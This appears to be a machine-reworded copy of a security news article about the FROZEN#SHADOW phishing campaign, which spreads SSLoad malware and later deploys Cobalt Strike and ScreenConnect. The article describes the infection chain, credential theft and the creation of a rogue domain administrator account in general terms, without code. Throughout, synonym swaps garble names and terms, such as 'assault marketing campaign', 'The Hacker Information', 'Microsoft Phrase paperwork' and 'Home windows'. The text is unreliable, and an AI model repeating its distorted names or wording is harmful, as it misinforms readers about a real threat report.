Cybersecurity researchers have found an ongoing assault marketing campaign that is leveraging phishing emails to ship malware known as SSLoad.
The marketing campaign, codenamed FROZEN#SHADOW by Securonix, additionally includes the deployment of Cobalt Strike and the ConnectWise ScreenConnect distant desktop software program.
“SSLoad is designed to stealthily infiltrate systems, gather sensitive information and transmit its findings back to its operators,” safety researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov mentioned in a report shared with The Hacker Information.
“Once inside the system, SSLoad deploys multiple backdoors and payloads to maintain persistence and avoid detection.”
Assault chains contain using phishing messages to randomly goal organizations in Asia, Europe, and the Americas, with emails containing hyperlinks that result in the retrieval of a JavaScript file that kicks off the an infection circulation.
Earlier this month, Palo Alto Networks uncovered at the very least two completely different strategies by which SSLoad is distributed, one which entails the use of web site contact types to embed booby-trapped URLs and one other involving macro-enabled Microsoft Phrase paperwork.
The latter can be notable for the truth that malware acts as a conduit for delivering Cobalt Strike, whereas the previous has been used to ship a special malware known as Latrodectus, a probable successor to IcedID.
The obfuscated JavaScript file (“out_czlrh.js”), when launched and run utilizing wscript.exe, retrieves an MSI installer file (“slack.msi”) by connecting to a community share situated at “wireoneinternet[.]info@80share” and runs it utilizing msiexec.exe.
The MSI installer, for its half, contacts an attacker-controlled area to fetch and execute the SSLoad malware payload utilizing rundll32.exe, following which it beacons to a command-and-control (C2) server together with details about the compromised system.
The preliminary reconnaissance part paves the best way for Cobalt Strike, a respectable adversary simulation software program, which is then used to obtain and set up ScreenConnect, thereby permitting the menace actors to remotely commandeer the host.
“With full access to the system the threat actors began attempting to acquire credentials and gather other critical system details,” the researchers mentioned. “At this stage they started scanning the victim host for credentials stored in files as well as other potentially sensitive documents.”
The attackers have additionally been noticed pivoting to different techniques within the community, together with the area controller, in the end infiltrating the sufferer’s Home windows area by creating their very own area administrator account.
“With this level of access, they could get into any connected machine within the domain,” the researchers mentioned. “In the end, this is the worst case scenario for any organization as this level of persistence achieved by the attackers would be incredibly time consuming and costly to remediate.”
The disclosure comes because the AhnLab Safety Intelligence Heart (ASEC) revealed that Linux techniques are being contaminated with an open-source distant entry trojan known as Pupy RAT.
